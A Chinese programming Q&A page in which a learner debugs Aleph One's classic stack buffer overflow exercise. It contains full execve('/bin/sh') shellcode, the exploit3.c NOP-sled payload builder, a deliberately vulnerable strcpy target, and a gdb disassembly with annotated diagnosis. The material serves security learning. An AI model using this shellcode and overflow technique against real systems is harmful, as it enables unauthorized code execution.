linux bin sh c,linux - 我想使用CShell代码使缓冲区溢出并执行bin/sh_c_开发99编程知识库...

我试图通过缓冲区溢出运行 shellcode，以执行 /bin/sh。

/* exploit3.c */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Bytes subtracted from the value get_sp() returns to form the guessed address; argv[2] overrides it. */
#define DEFAULT_OFFSET 0

/* Size in bytes of the EGG payload when argv[1] is not given. */
#define DEFAULT_BUFFER_SIZE 512

/* x86 one-byte `nop` (0x90); the sled in front of the shellcode is made of it. */
#define NOP 0x90

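/*
 * Aleph One's Linux/x86 execve("/bin/sh") shellcode: 45 bytes, no NUL bytes.
 * Layout (classic disassembly, offsets from the first byte):
 *   00  eb 1f            jmp  +0x1f              ; to the call at offset 33
 *   02  5e               pop  %esi               ; esi = address of "/bin/sh"
 *   03  89 76 08         mov  %esi,0x8(%esi)     ; argv[0] = &"/bin/sh" (patched in place)
 *   06  31 c0            xor  %eax,%eax
 *   08  88 46 07         mov  %al,0x7(%esi)      ; write the NUL that ends "/bin/sh"
 *   0b  89 46 0c         mov  %eax,0xc(%esi)     ; argv[1] = NULL
 *   0e  b0 0b            mov  $0xb,%al           ; __NR_execve
 *   10  89 f3            mov  %esi,%ebx          ; filename
 *   12  8d 4e 08         lea  0x8(%esi),%ecx     ; argv
 *   15  8d 56 0c         lea  0xc(%esi),%edx     ; envp
 *   18  cd 80            int  $0x80
 *   1a  31 db            xor  %ebx,%ebx
 *   1c  89 d8            mov  %ebx,%eax
 *   1e  40               inc  %eax               ; __NR_exit
 *   1f  cd 80            int  $0x80
 *   21  e8 dc ff ff ff   call -0x24              ; pushes &"/bin/sh", lands on the pop
 *   26  "/bin/sh"
 *
 * It writes into its own bytes (the string terminator and the argv slots), so
 * the memory it runs from must be writable AND executable; a non-executable
 * stack (the default on modern Linux) stops it before the first syscall.
 *
 * Fix: the page rendering had dropped every backslash ("xebx1fx5e..."), which
 * made this a ~120-character ASCII string rather than machine code. The
 * escapes are restored here.
 */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";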

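/*
 * Return the current stack pointer; the exploit uses it as the base for
 * guessing where the EGG string will sit in the victim's stack.
 *
 * The posted version executed `movl %esp,%eax` and fell off the end of the
 * function with no `return`, trusting %eax to still hold the value. That is
 * undefined behaviour and an optimizing compiler may not preserve it. An
 * output operand makes the data flow explicit. Only the low 32 bits are read
 * (`movl`): this tool targets i386, like the shellcode above.
 */
unsigned long get_sp(void)
{
    unsigned int sp;
    __asm__ volatile ("movl %%esp, %0" : "=r"(sp));
    return sp;
}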

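/*
 * Build the EGG environment variable and drop into a shell that inherits it.
 *
 *   argv[1]  payload size in bytes (default DEFAULT_BUFFER_SIZE)
 *   argv[2]  bytes subtracted from get_sp() to form the guessed address
 *
 * Payload layout, front to back: "EGG=" written over the start of a NOP sled
 * that covers the front half, the shellcode centred in the buffer, the guessed
 * address repeated to the end, and a terminating NUL. The victim is then run
 * by hand from the spawned shell: `./vulnerable $EGG`.
 *
 * Why `system("/bin/bash")` at the end (the second question on the page):
 * putenv() changes only this process's environment, and a process cannot
 * export a variable into its parent shell. Starting a child shell that
 * inherits EGG is the simplest way to hand the payload to an interactive
 * session; the `exit` in the expected transcript leaves that child shell.
 *
 * Fixes relative to the posted version: the escapes lost on the page ("\n",
 * '\0') are restored; a size that is not positive or too small to hold the
 * shellcode between "EGG=" and the NUL would have written past the malloc'd
 * block and is now rejected; a size that is not a multiple of 4 no longer
 * overruns on the address fill; allocation failure exits non-zero; `int main`.
 */
int main(int argc, char *argv[])
{
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;

    if (argc > 1)
        bsize = atoi(argv[1]);
    if (argc > 2)
        offset = atoi(argv[2]);

    /* The shellcode is centred in the buffer; "EGG=" takes bytes 0..3 and
       the terminating NUL takes byte bsize-1, so both must stay clear of it. */
    long sl = (long)strlen(shellcode);
    long start = (long)(bsize / 2) - sl / 2;
    if (bsize <= 0 || start < 4 || start + sl > bsize - 1) {
        fprintf(stderr, "Buffer size %d is too small for the %ld-byte shellcode.\n", bsize, sl);
        exit(1);
    }

    char *buff = malloc((size_t)bsize);
    if (!buff) {
        fprintf(stderr, "Can't allocate memory.\n");
        exit(1);
    }

    /* The target is i386 (see the shellcode and get_sp), so addresses in the
       payload are always 4 bytes wide, whatever the host's sizeof(long). */
    uint32_t addr = (uint32_t)(get_sp() - (unsigned long)offset);
    printf("Using address: 0x%lx\n", (unsigned long)addr);

    /* Repeat the guessed address over the whole buffer; the final copy is
       clipped so a size that is not a multiple of 4 cannot overrun. */
    for (int i = 0; i < bsize; i += 4) {
        size_t n = (size_t)(bsize - i) < sizeof addr ? (size_t)(bsize - i) : sizeof addr;
        memcpy(buff + i, &addr, n);
    }

    /* NOP sled over the front half: landing anywhere in it slides into the code. */
    memset(buff, NOP, (size_t)bsize / 2);

    memcpy(buff + start, shellcode, (size_t)sl);

    buff[bsize - 1] = '\0';    /* putenv() needs a C string */
    memcpy(buff, "EGG=", 4);   /* variable name; replaces the first four NOPs */

    /* Never freed on purpose: putenv() keeps this very pointer in environ. */
    putenv(buff);

    /* Child shell inherits EGG; run the victim from it. Writing "$EGG" with
       quotes keeps the shell from splitting the payload should an address
       byte happen to be a whitespace character. */
    system("/bin/bash");
    return 0;
}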

/* vulnerable.c */
#include <stdio.h>
#include <string.h>

/*
 * Deliberately vulnerable target: copies argv[1] into a 512-byte stack buffer
 * with no length check, so an argument longer than 512 bytes overwrites
 * whatever sits above xbuff in the frame. It is left exactly like this because
 * the exercise depends on the frame layout; in real code the copy must be
 * bounded, e.g. snprintf(xbuff, sizeof xbuff, "%s", argv[1]) or a length
 * check before memcpy.
 *
 * What the gdb dump on this page shows about the frame, relevant to "where
 * did it go wrong":
 *   - xbuff starts at -0x208(%ebp) (`lea -0x208(%ebp),%eax` before the call),
 *     so it ends at -0x8(%ebp) with 4 bytes of padding above it.
 *   - The prologue realigns the stack (`and $0xfffffff0,%esp`) and saves the
 *     pre-alignment pointer with `push %ecx`, which lands at -0x4(%ebp), i.e.
 *     just above xbuff. The epilogue reloads it (`mov -0x4(%ebp),%ecx`), then
 *     `lea -0x4(%ecx),%esp` and `ret`: the return address is fetched from
 *     *(ecx - 4), NOT from the slot directly above the saved %ebp that the
 *     Aleph One exploit assumes it overwrites. A 612-byte EGG therefore
 *     replaces that saved %ecx with the guessed address, and control goes to
 *     whatever 4 bytes sit at guessed_address - 4 — presumably not a pointer
 *     into the NOP sled, which would account for the missing shell.
 *   - No canary load or compare (%gs:0x14) appears in the dump, so the stack
 *     protector looks disabled; whether the stack is executable and ASLR is
 *     off cannot be told from here, and both are required for EGG to run.
 */
int main(int argc, char *argv[])
{
    char xbuff[512];

    if(argc >1)
        /* Unbounded copy: the overflow the exercise depends on. */
        strcpy(xbuff, argv[1]);

    return 0;
}

函数 main 的汇编代码：
(gdb) disass main

Dump of assembler code for function main:

0x0804840b : lea 0x4(%esp),%ecx

0x0804840f : and $0xfffffff0,%esp

0x08048412 : pushl -0x4(%ecx)

0x08048415 : push %ebp

0x08048416 : mov %esp,%ebp

0x08048418 : push %ecx

0x08048419 : sub $0x204,%esp

0x0804841f : mov %ecx,%eax

0x08048421 : cmpl $0x1,(%eax)

0x08048424 : jle 0x8048441

0x08048426 : mov 0x4(%eax),%eax

0x08048429 : add $0x4,%eax

0x0804842c : mov (%eax),%eax

0x0804842e : sub $0x8,%esp

0x08048431 : push %eax

0x08048432 : lea -0x208(%ebp),%eax

0x08048438 : push %eax

0x08048439 : call 0x80482e0

0x0804843e : add $0x10,%esp

0x08048441 : mov $0x0,%eax

0x08048446 : mov -0x4(%ebp),%ecx

0x08048449 : leave

0x0804844a : lea -0x4(%ecx),%esp

0x0804844d : ret

End of assembler dump.

程序被执行了，但 /bin/sh 没有被调用：
[aleph1]$ ./exploit3 612

Using address: 0xbffffdb4

[aleph1]$ ./vulnerable $EGG

[aleph1]$

预期输出为：
[aleph1]$ ./exploit3 612

Using address: 0xbffffdb4

[aleph1]$ ./vulnerable $EGG

$ exit

[aleph1]$

哪儿出错了?!

第二个问题:为什么main()的末尾运行system("/bin/bash")?
